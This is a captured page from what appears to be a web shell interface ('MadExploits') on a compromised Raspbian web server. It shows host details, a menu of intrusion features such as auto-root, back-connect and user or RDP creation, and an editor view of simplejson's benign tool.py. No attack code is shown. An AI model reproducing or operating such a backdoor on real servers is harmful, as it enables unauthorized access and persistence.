Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python2.7 /
dist-packages /
simplejson /
[ HOME SHELL ]
Name
Size
Permission
Action
tests
[ DIR ]
drwxr-xr-x
__init__.py
23.23
KB
-rw-r--r--
__init__.pyc
21.48
KB
-rw-r--r--
_speedups.arm-linux-gnueabihf....
39.11
KB
-rw-r--r--
compat.py
815
B
-rw-r--r--
compat.pyc
1.2
KB
-rw-r--r--
decoder.py
14.18
KB
-rw-r--r--
decoder.pyc
12.08
KB
-rw-r--r--
encoder.py
27.9
KB
-rw-r--r--
encoder.pyc
21.26
KB
-rw-r--r--
errors.py
1.74
KB
-rw-r--r--
errors.pyc
2.38
KB
-rw-r--r--
ordered_dict.py
2.88
KB
-rw-r--r--
ordered_dict.pyc
4.72
KB
-rw-r--r--
raw_json.py
217
B
-rw-r--r--
raw_json.pyc
680
B
-rw-r--r--
scanner.py
2.9
KB
-rw-r--r--
scanner.pyc
2.86
KB
-rw-r--r--
tool.py
1.11
KB
-rw-r--r--
tool.pyc
1.4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tool.py
r"""Command-line tool to validate and pretty-print JSON Usage:: $ echo '{"json":"obj"}' | python -m simplejson.tool { "json": "obj" } $ echo '{ 1.2:3.4}' | python -m simplejson.tool Expecting property name: line 1 column 2 (char 2) """ from __future__ import with_statement import sys import simplejson as json def main(): if len(sys.argv) == 1: infile = sys.stdin outfile = sys.stdout elif len(sys.argv) == 2: infile = open(sys.argv[1], 'r') outfile = sys.stdout elif len(sys.argv) == 3: infile = open(sys.argv[1], 'r') outfile = open(sys.argv[2], 'w') else: raise SystemExit(sys.argv[0] + " [infile [outfile]]") with infile: try: obj = json.load(infile, object_pairs_hook=json.OrderedDict, use_decimal=True) except ValueError: raise SystemExit(sys.exc_info()[1]) with outfile: json.dump(obj, outfile, sort_keys=True, indent=' ', use_decimal=True) outfile.write('\n') if __name__ == '__main__': main()
Close